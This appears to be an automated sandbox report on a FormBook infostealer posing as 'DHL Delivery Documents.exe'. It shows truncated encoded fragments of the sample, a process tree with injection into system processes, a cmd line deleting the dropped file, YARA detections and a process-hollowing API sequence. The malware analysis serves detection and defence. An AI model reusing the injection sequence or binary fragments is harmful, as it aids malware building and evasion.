                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAEe82EAAAAAAAAAAOAALiALAVAAAJYAAACaAAAAAAAAUrUAAAAgAAAAwAAAAABAAAAgAAAAAgA
                        2022-01-28 13:03:29 UTC234INData Raw: 6a 67 41 41 42 68 51 71 63 75 55 42 41 48 41 53 41 53 6a 61 41 41 41 4b 6a 46 4d 41 41 41 45 6f 36 67 41 41 43 6e 50 72 41 41 41 4b 65 67 41 44 4d 41 6b 41 44 77 41 41 41 41 41 41 41 41 41 43 4a 58 74 48 41 41 41 45 41 31 68 39 52 77 41 41 42 43 6f 41 45 7a 41 46 41 42 6b 41 41 41 41 55 41 41 41 52 41 6e 74 49 41 41 41 45 41 69 56 37 52 77 41 41 42 43 55 4b 46 31 68 39 52 77 41 41 42 41 61 52 4b 67 41 41 41 42 4d 77 42 41 41 6b 41 41 41 41 46 41 41 41 45 51 4a 37 52 77 41 41 42 41 6f 43 4a 58 74 48 41 41 41 45 47 6c 68 39 52 77 41 41 42 41 4a 37 53 41 41 41 42 41 59 6f 55 51 41 41 43 69 55 6d 4b 67 4d 77 42 51 42 4e 41 41 41 41 41 41 41 41 41 41 4a 37 53 41 41 41 42 41 51 6c 46 31 6a 2b 43 77 49 41 41 39 4b 63 41 6e 74 49 41 41 41 45 42 43 55 58 57 50 34
                        Data Ascii: jgAABhQqcuUBAHASASjaAAAKjFMAAAEo6gAACnPrAAAKegADMAkADwAAAAAAAAACJXtHAAAEA1h9RwAABCoAEzAFABkAAAAUAAARAntIAAAEAiV7RwAABCUKF1h9RwAABAaRKgAAABMwBAAkAAAAFAAAEQJ7RwAABAoCJXtHAAAEGlh9RwAABAJ7SAAABAYoUQAACiUmKgMwBQBNAAAAAAAAAAJ7SAAABAQlF1j+CwIAA9KcAntIAAAEBCUXWP4
                        2022-01-28 13:03:29 UTC250INData Raw: 64 58 52 6c 41 46 42 79 62 32 4e 6c 63 33 4d 41 55 48 4a 76 59 32 56 7a 63 30 31 76 5a 48 56 73 5a 51 42 51 63 6d 39 6a 5a 58 4e 7a 54 57 39 6b 64 57 78 6c 51 32 39 73 62 47 56 6a 64 47 6c 76 62 67 42 51 62 32 6c 75 64 41 42 54 61 58 70 6c 41 46 4e 70 65 6d 56 47 41 45 56 34 59 32 56 77 64 47 6c 76 62 67 42 44 64 57 78 30 64 58 4a 6c 53 57 35 6d 62 77 42 54 65 58 4e 30 5a 57 30 75 52 32 78 76 59 6d 46 73 61 58 70 68 64 47 6c 76 62 67 42 4f 64 57 31 69 5a 58 4a 54 64 48 6c 73 5a 58 4d 41 53 55 46 7a 65 57 35 6a 55 6d 56 7a 64 57 78 30 41 45 6c 45 61 58 4e 77 62 33 4e 68 59 6d 78 6c 41 45 6c 75 64 44 45 32 41 45 6c 75 64 44 4d 79 41 45 6c 75 64 44 59 30 41 45 6c 75 64 46 42 30 63 67 42 43 61 57 35 68 63 6e 6c 53 5a 57 46 6b 5a 58 49 41 55 33 6c 7a 64 47 56
                        Data Ascii: dXRlAFByb2Nlc3MAUHJvY2Vzc01vZHVsZQBQcm9jZXNzTW9kdWxlQ29sbGVjdGlvbgBQb2ludABTaXplAFNpemVGAEV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBTeXN0ZW0uR2xvYmFsaXphdGlvbgBOdW1iZXJTdHlsZXMASUFzeW5jUmVzdWx0AElEaXNwb3NhYmxlAEludDE2AEludDMyAEludDY0AEludFB0cgBCaW5hcnlSZWFkZXIAU3lzdGV
                        2022-01-28 13:03:29 UTC266INData Raw: 41 41 41 41 41 41 59 67 41 51 45 52 67 4a 30 70 41 51 41 6b 36 62 75 52 36 61 32 55 35 34 36 4c 36 62 75 52 36 61 32 55 35 34 36 4c 36 62 75 52 36 61 32 55 35 34 36 4c 36 62 75 52 36 61 32 55 35 34 36 4c 41 41 41 58 41 51 41 53 51 32 39 77 65 58 4a 70 5a 32 68 30 49 4d 4b 70 49 43 41 79 4d 44 49 78 41 41 41 70 41 51 41 6b 5a 6a 5a 6d 4e 6a 6b 33 4e 7a 59 74 59 54 51 31 4d 53 30 30 5a 44 55 30 4c 54 6b 78 4d 6a 67 74 4e 44 64 6b 5a 6d 59 77 4e 44 4d 79 5a 6d 4d 33 41 41 41 4d 41 51 41 48 4d 53 34 77 4c 6a 41 75 4d 41 41 41 52 77 45 41 47 69 35 4f 52 56 52 47 63 6d 46 74 5a 58 64 76 63 6d 73 73 56 6d 56 79 63 32 6c 76 62 6a 31 32 4e 43 34 77 41 51 42 55 44 68 52 47 63 6d 46 74 5a 58 64 76 63 6d 74 45 61 58 4e 77 62 47 46 35 54 6d 46 74 5a 52 41 75 54 6b 56
                        Data Ascii: AAAAAAYgAQERgJ0pAQAk6buR6a2U546L6buR6a2U546L6buR6a2U546L6buR6a2U546LAAAXAQASQ29weXJpZ2h0IMKpICAyMDIxAAApAQAkZjZmNjk3NzYtYTQ1MS00ZDU0LTkxMjgtNDdkZmYwNDMyZmM3AAAMAQAHMS4wLjAuMAAARwEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC4wAQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRAuTkV


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:2
                        Start time:14:03:26
                        Start date:28/01/2022
                        Path:C:\Users\user\Desktop\DHL Delivery Documents.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\DHL Delivery Documents.exe"
                        Imagebase:0xad0000
                        File size:48640 bytes
                        MD5 hash:5BC8492C9F262D1F9840635B87EDF9C5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Target ID:7
                        Start time:14:03:31
                        Start date:28/01/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        Imagebase:0x970000
                        File size:55400 bytes
                        MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:moderate

                        Target ID:8
                        Start time:14:03:34
                        Start date:28/01/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff720ea0000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        Target ID:12
                        Start time:14:03:56
                        Start date:28/01/2022
                        Path:C:\Windows\SysWOW64\msdt.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\msdt.exe
                        Imagebase:0xeb0000
                        File size:1508352 bytes
                        MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:moderate

                        Target ID:13
                        Start time:14:04:02
                        Start date:28/01/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        Imagebase:0xd80000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:14
                        Start time:14:04:03
                        Start date:28/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Reset < >

                          Execution Graph

                          Execution Coverage:24%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:13
                          Total number of Limit Nodes:0

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00007FFC081C05A7 1 Function_00007FFC081C4BA5 56 Function_00007FFC081C512C 1->56 2 Function_00007FFC081C01A2 17 Function_00007FFC081C0080 2->17 25 Function_00007FFC081C0090 2->25 3 Function_00007FFC081C52A2 4 Function_00007FFC081C00A0 5 Function_00007FFC081C04B5 5->17 5->25 6 Function_00007FFC081C26BA 74 Function_00007FFC081C1460 6->74 7 Function_00007FFC081C15B8 8 Function_00007FFC081C2BAD 46 Function_00007FFC081C00D0 8->46 9 Function_00007FFC081C24B1 65 Function_00007FFC081C2619 9->65 10 Function_00007FFC081C36B1 11 Function_00007FFC081C21B0 12 Function_00AD218C 13 Function_00007FFC081C2689 14 Function_00007FFC081C0088 15 Function_00007FFC081C017D 15->17 15->25 16 Function_00007FFC081C377C 18 Function_00AD2C9F 19 Function_00007FFC081C2199 20 Function_00AD569A 21 Function_00007FFC081C0098 22 Function_00007FFC081C598D 23 Function_00007FFC081C4991 24 Function_00007FFC081C5B91 26 Function_00007FFC081C0CEA 27 Function_00007FFC081C35E8 28 Function_00007FFC081C04E2 28->17 28->25 29 Function_00007FFC081C15E1 30 Function_00007FFC081C4AF9 31 Function_00007FFC081C5CED 32 Function_00007FFC081C10F2 33 Function_00007FFC081C00F0 34 Function_00007FFC081C06C4 35 Function_00007FFC081C57C9 36 Function_00007FFC081C00C8 63 Function_00007FFC081C0200 36->63 36->65 37 Function_00AD56CA 38 Function_00007FFC081C0ED5 39 Function_00007FFC081C31D5 62 Function_00007FFC081C3404 39->62 40 Function_00007FFC081C00D8 40->46 41 Function_00007FFC081C3CCD 97 Function_00007FFC081C2950 41->97 42 Function_00AD56D6 43 Function_00007FFC081C1CCC 44 Function_00007FFC081C39D3 45 Function_00007FFC081C27D1 47 Function_00007FFC081C2029 48 Function_00007FFC081C271F 48->74 49 Function_00007FFC081C0F21 51 Function_00007FFC081C0120 49->51 58 Function_00007FFC081C0130 49->58 50 Function_00007FFC081C3121 51->7 77 Function_00007FFC081C0178 51->77 52 Function_00007FFC081C3C37 92 Function_00007FFC081C2240 52->92 52->97 53 Function_00007FFC081C1239 67 Function_00007FFC081C1110 53->67 83 Function_00007FFC081C0170 53->83 54 Function_00007FFC081C2238 54->36 54->40 55 Function_00007FFC081C0D2D 55->14 55->21 57 Function_00007FFC081C2931 58->7 58->77 59 Function_00007FFC081C0830 60 Function_00007FFC081C0205 60->17 60->25 61 Function_00007FFC081C1505 61->7 61->77 64 Function_00007FFC081C3716 66 Function_00007FFC081C0D10 68 Function_00AD566E 69 Function_00007FFC081C0764 70 Function_00007FFC081C416B 71 Function_00007FFC081C0168 71->7 71->77 72 Function_00AD446A 73 Function_00007FFC081C2361 73->63 73->65 74->71 74->77 75 Function_00007FFC081C0160 76 Function_00007FFC081C3A75 76->92 78 Function_00AD5677 79 Function_00007FFC081C016D 80 Function_00007FFC081C076C 80->17 80->25 81 Function_00007FFC081C2071 81->33 82 Function_00007FFC081C0E70 84 Function_00007FFC081C0C70 85 Function_00007FFC081C0D47 86 Function_00007FFC081C384B 87 Function_00007FFC081C1749 87->75 88 Function_00007FFC081C0849 89 Function_00007FFC081C5342 90 Function_00007FFC081C0541 91 Function_00AD2842 92->36 92->40 93 Function_00007FFC081C3456 94 Function_00007FFC081C1355 95 Function_00AD2058 96 Function_00AD2353
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.301370472.00007FFC081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC081C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ffc081c0000_DHL Delivery Documents.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$Zr$f$jt$f
                          • API String ID: 0-1899289728
                          • Opcode ID: 9ecb815fca1493f8b7d267cf2474f5b4ac594a674aacc273fa544b98d254c5d2
                          • Instruction ID: 189131a437902323cef6ebddc8026deb6c61a21519ff5067212cfb854382fa86
                          • Opcode Fuzzy Hash: 9ecb815fca1493f8b7d267cf2474f5b4ac594a674aacc273fa544b98d254c5d2
                          • Instruction Fuzzy Hash: 01A2D67090862D8FEBA8DB18C894BE9B7B1FF54305F1081E9D04EE7291DB34AA85CF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 204 7ffc081c5ced-7ffc081c5e3b VirtualAllocEx 209 7ffc081c5e3d 204->209 210 7ffc081c5e43-7ffc081c5ea9 204->210 209->210 213 7ffc081c5eb4-7ffc081c5f80 ResumeThread 210->213 214 7ffc081c5eab-7ffc081c5eb3 210->214 219 7ffc081c5f88-7ffc081c5fd2 213->219 220 7ffc081c5f82 213->220 214->213 220->219
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.301370472.00007FFC081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC081C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ffc081c0000_DHL Delivery Documents.jbxd
                          Similarity
                          • API ID: AllocResumeThreadVirtual
                          • String ID:
                          • API String ID: 234695336-0
                          • Opcode ID: d0f75a88dcc8f685a7abad8fbbda4a96b84d385cdcb3f0f835a440764d5efc73
                          • Instruction ID: 838abe92909191f04ff206f5223449e4ab1c8cb74a98cba9b1e6833b5bf728fe
                          • Opcode Fuzzy Hash: d0f75a88dcc8f685a7abad8fbbda4a96b84d385cdcb3f0f835a440764d5efc73
                          • Instruction Fuzzy Hash: 6CB11570D0865D8FDB98DF68C845AE9BBF1FF6A310F10826AD44DE7252DA70A885CF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 312 7ffc081c5342-7ffc081c56e2 317 7ffc081c5704-7ffc081c5766 Wow64SetThreadContext 312->317 318 7ffc081c56e4-7ffc081c5701 312->318 320 7ffc081c5768 317->320 321 7ffc081c576e-7ffc081c57c4 317->321 318->317 320->321
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.301370472.00007FFC081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC081C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ffc081c0000_DHL Delivery Documents.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: e5b64c15ca6a3c22392ab24ed53f1fb0ca1fbf43ef25a632446f9733aa087ab5
                          • Instruction ID: c2a93f9a3c5b20a1ebb8af5fb829d8b5cae9af62615e868ab34286f01346b6ff
                          • Opcode Fuzzy Hash: e5b64c15ca6a3c22392ab24ed53f1fb0ca1fbf43ef25a632446f9733aa087ab5
                          • Instruction Fuzzy Hash: 1A511570908A5C8FEB94DF98C849BE9BBF1FB69311F10826AD409E7251DB74A885CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 324 7ffc081c4ba5-7ffc081c4c88 329 7ffc081c4c8a-7ffc081c4ca9 324->329 330 7ffc081c4cfd-7ffc081c4d3c 324->330 329->330 335 7ffc081c4cab-7ffc081c4cb5 329->335 333 7ffc081c4d3e-7ffc081c4d5d 330->333 334 7ffc081c4db1-7ffc081c4e47 330->334 333->334 345 7ffc081c4d5f-7ffc081c4d69 333->345 343 7ffc081c4e49-7ffc081c4e68 334->343 344 7ffc081c4ebc-7ffc081c5010 CreateProcessA 334->344 336 7ffc081c4cb7-7ffc081c4cca 335->336 337 7ffc081c4cef-7ffc081c4cf7 335->337 340 7ffc081c4cce-7ffc081c4ce1 336->340 341 7ffc081c4ccc 336->341 337->330 340->340 342 7ffc081c4ce3-7ffc081c4ceb 340->342 341->340 342->337 343->344 352 7ffc081c4e6a-7ffc081c4e74 343->352 363 7ffc081c5018-7ffc081c5110 call 7ffc081c512c 344->363 364 7ffc081c5012 344->364 346 7ffc081c4d6b-7ffc081c4d7e 345->346 347 7ffc081c4da3-7ffc081c4dab 345->347 349 7ffc081c4d82-7ffc081c4d95 346->349 350 7ffc081c4d80 346->350 347->334 349->349 353 7ffc081c4d97-7ffc081c4d9f 349->353 350->349 355 7ffc081c4e76-7ffc081c4e89 352->355 356 7ffc081c4eae-7ffc081c4eb6 352->356 353->347 358 7ffc081c4e8b 355->358 359 7ffc081c4e8d-7ffc081c4ea0 355->359 356->344 358->359 359->359 360 7ffc081c4ea2-7ffc081c4eaa 359->360 360->356 378 7ffc081c5117-7ffc081c512a 363->378 379 7ffc081c5112 363->379 364->363 379->378
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.301370472.00007FFC081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC081C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ffc081c0000_DHL Delivery Documents.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 4bc75135736abab29cf6cde25164e6e51b47b89f8098c1182496ceeaac32014b
                          • Instruction ID: 0f4852c5baf5bd25bd6985e2dc93d1c45a4873400a9f2f1c8b6bb45b3fe4a0c3
                          • Opcode Fuzzy Hash: 4bc75135736abab29cf6cde25164e6e51b47b89f8098c1182496ceeaac32014b
                          • Instruction Fuzzy Hash: 88025E70918A8D8FEBA4DF28C859BE977E1FF59300F00412AD84DD7291DF749A45CB85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 380 7ffc081c598d-7ffc081c5999 381 7ffc081c59a4-7ffc081c5a5c 380->381 382 7ffc081c599b-7ffc081c59a3 380->382 386 7ffc081c5a84-7ffc081c5b16 WriteProcessMemory 381->386 387 7ffc081c5a5e-7ffc081c5a81 381->387 382->381 389 7ffc081c5b18 386->389 390 7ffc081c5b1e-7ffc081c5b8c 386->390 387->386 389->390
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.301370472.00007FFC081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC081C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ffc081c0000_DHL Delivery Documents.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 15f304d0c4b82ebd16d1bd85da19b97181a6148aadfdbce261aedb16049cd8f3
                          • Instruction ID: 6b360f8db13ae6db2f85778026577009ea8397527cf0d8a9ef95c66df48f188f
                          • Opcode Fuzzy Hash: 15f304d0c4b82ebd16d1bd85da19b97181a6148aadfdbce261aedb16049cd8f3
                          • Instruction Fuzzy Hash: D1611570918A5D8FDB94DF68C884BE9BBF1FB69311F1082AAD44DE3251CB74A985CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:4.3%
                          Dynamic/Decrypted Code Coverage:2.7%
                          Signature Coverage:6%
                          Total number of Nodes:587
                          Total number of Limit Nodes:73
                          execution_graph 33126 41d430 33127 41d43b 33126->33127 33129 419c00 33126->33129 33130 419c26 33129->33130 33141 408b70 33130->33141 33132 419c32 33133 419c79 33132->33133 33149 40d180 33132->33149 33133->33127 33135 419c47 33136 419c5c 33135->33136 33197 418940 33135->33197 33161 40a620 33136->33161 33139 419c6b 33140 418940 2 API calls 33139->33140 33140->33133 33200 408ac0 33141->33200 33143 408b7d 33144 408b84 33143->33144 33212 408a60 33143->33212 33144->33132 33150 40d1ac 33149->33150 33634 40a020 33150->33634 33152 40d1be 33638 40d090 33152->33638 33155 40d1f1 33158 40d202 33155->33158 33160 418720 2 API calls 33155->33160 33156 40d1d9 33157 40d1e4 33156->33157 33159 418720 2 API calls 33156->33159 33157->33135 33158->33135 33159->33157 33160->33158 33162 40a645 33161->33162 33163 40a020 LdrLoadDll 33162->33163 33164 40a69c 33163->33164 33657 409ca0 33164->33657 33166 40a913 33166->33139 33167 40a6c2 33167->33166 33666 4133b0 33167->33666 33169 40a707 33169->33166 33669 4079e0 33169->33669 33171 40a74b 33171->33166 33676 418790 33171->33676 33175 40a7a1 33176 40a7a8 33175->33176 33688 4182a0 33175->33688 33178 41a0b0 2 API calls 33176->33178 33180 40a7b5 33178->33180 33180->33139 33181 40a7f2 33182 41a0b0 2 API calls 33181->33182 33183 40a7f9 33182->33183 33183->33139 33184 40a802 33185 40d210 3 API calls 33184->33185 33186 40a876 33185->33186 33186->33176 33187 40a881 33186->33187 33188 41a0b0 2 API calls 33187->33188 33189 40a8a5 33188->33189 33693 4182f0 33189->33693 33192 4182a0 2 API calls 33193 40a8e0 33192->33193 33193->33166 33698 4180b0 33193->33698 33196 418940 2 API calls 33196->33166 33198 4191f0 LdrLoadDll 33197->33198 33199 41895f ExitProcess 33198->33199 33199->33136 33231 416e60 33200->33231 33204 408ae6 33204->33143 33205 408adc 33205->33204 33238 419540 33205->33238 33207 408b23 33207->33204 33249 4088e0 33207->33249 33209 408b43 33255 408330 LdrLoadDll 33209->33255 33211 408b55 33211->33143 33213 408a7a 33212->33213 33214 419830 LdrLoadDll 33212->33214 33608 419830 33213->33608 33214->33213 33217 419830 LdrLoadDll 33218 408aa1 33217->33218 33219 40cf80 33218->33219 33220 40cf99 33219->33220 33617 409ea0 33220->33617 33222 40cfac 33621 418470 33222->33621 33226 40cfd2 33229 40cffd 33226->33229 33627 4184f0 33226->33627 33228 418720 2 API calls 33230 408b95 33228->33230 33229->33228 33230->33132 33232 416e6f 33231->33232 33256 413e60 33232->33256 33234 408ad3 33235 416d10 33234->33235 33262 418890 33235->33262 33239 419559 33238->33239 33269 413a60 33239->33269 33241 419571 33242 41957a 33241->33242 33308 419380 33241->33308 33242->33207 33244 41958e 33244->33242 33326 418190 33244->33326 33252 4088fa 33249->33252 33586 406e30 33249->33586 33251 408901 33251->33209 33252->33251 33599 4070f0 33252->33599 33255->33211 33257 413e7a 33256->33257 33258 413e6e 33256->33258 33257->33234 33258->33257 33261 4142e0 LdrLoadDll 33258->33261 33260 413fcc 33260->33234 33261->33260 33263 416d25 33262->33263 33265 4191f0 33262->33265 33263->33205 33266 419200 33265->33266 33268 419222 33265->33268 33267 413e60 LdrLoadDll 33266->33267 33267->33268 33268->33263 33270 413d95 33269->33270 33272 413a74 33269->33272 33270->33241 33272->33270 33334 417ee0 33272->33334 33274 413ba0 33337 4185f0 33274->33337 33275 413b83 33395 4186f0 LdrLoadDll 33275->33395 33278 413b8d 33278->33241 33279 413bc7 33280 41a0b0 2 API calls 33279->33280 33281 413bd3 33280->33281 33281->33278 33282 413d59 33281->33282 33283 413d6f 33281->33283 33288 413c62 33281->33288 33284 418720 2 API calls 33282->33284 33404 4137a0 LdrLoadDll NtReadFile NtClose 33283->33404 33285 413d60 33284->33285 33285->33241 33287 413d82 33287->33241 33289 413cc9 33288->33289 33291 413c71 33288->33291 33289->33282 33290 413cdc 33289->33290 33397 418570 33290->33397 33293 413c76 33291->33293 33294 413c8a 33291->33294 33396 413660 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33293->33396 33296 413ca7 33294->33296 33297 413c8f 33294->33297 33296->33285 33353 413420 33296->33353 33341 413700 33297->33341 33299 413c80 33299->33241 33302 413d3c 33401 418720 33302->33401 33303 413c9d 33303->33241 33306 413cbf 33306->33241 33307 413d48 33307->33241 33309 419391 33308->33309 33310 4193a3 33309->33310 33422 41a030 33309->33422 33310->33244 33312 4193c4 33425 413070 